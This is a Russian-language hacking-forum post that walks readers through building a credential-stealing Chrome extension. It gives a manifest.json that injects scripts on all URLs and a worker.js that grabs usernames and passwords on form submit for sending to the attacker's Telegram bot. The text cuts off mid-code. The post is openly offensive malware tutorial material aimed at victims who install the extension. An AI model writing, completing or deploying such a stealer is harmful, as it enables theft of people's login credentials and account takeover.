Стиллер в расширении.

  • Автор темы Admin

Admin

#1
Администратор
Регистрация
31.12.2019
Сообщения
6,871
Реакции
24
TUSstroDROuLvGXFzMOqzQ.png




Привет, хацкер, сегодня мы напишем стиллер/логгер на JavaSript с отправкой логов в телегу.

Итак, стиллер работает таким образом:

  • Жертва устанавливает расширение в браузер, затем при попытке входа на сайт (данный стиллер поддерживает большинство сайтов) к злоумышленнику (нам) отправляются данные из поля для ввода. Всё просто.


Coding Time!

Создадим manifest.json в котором будет содержаться имя, описание, версия скрипта:

Код:
{ "manifest_version": 2, "name": "IceRed D$", // Имя скрипта "version": "0.1", // Версия "description": "Example ChromeExtension", // Описание "content_scripts": [ { "matches": [ "<all_urls>" ], // Указываем, что расширение должно работать со всеми url "js": [ "jquery.js" , "worker.js" ], // Добавляем источники кода "run_at": "document_end" } ] }
B80dzwIwT7S8YapBOWDXpQ.png



P.S Если вы хотите установить фильтр для конкретных сайтов, то вместо <all_urls> вписываете домен сайта(ов)

Следующим шагом нам нужно скачать jquery.js и добавить в папку с нашим расширением.
99D6ccbSSey7HJLRHTrBvw.png



Теперь нам нужно создать worker.js в котором у нас происходит получение значений из полей для ввода, а после отправка лога в телеграм бот.

Код:
var token = 'XXX'; // ВАШ токен тут (замени XXX) var api = 'https://api.telegram.org/bot' + token; // Переменная для запроса к API с токеном бота var UID = 'XXX'; // Ваш ID тут (замени XXX) $("form").submit(function() { var login = $(this).parent().find('input[type=text]').val(); // Получаем логин, из поля с типом text var pass = $(this).parent().find('input[type=password]').val(); // Получаем пароль, из поля с типом password var currentSite = document.domain; // Получаем домен сайта var message = "<b>NEW LOG
 

Members, viewing this thread

Сейчас на форуме нет ни одного пользователя.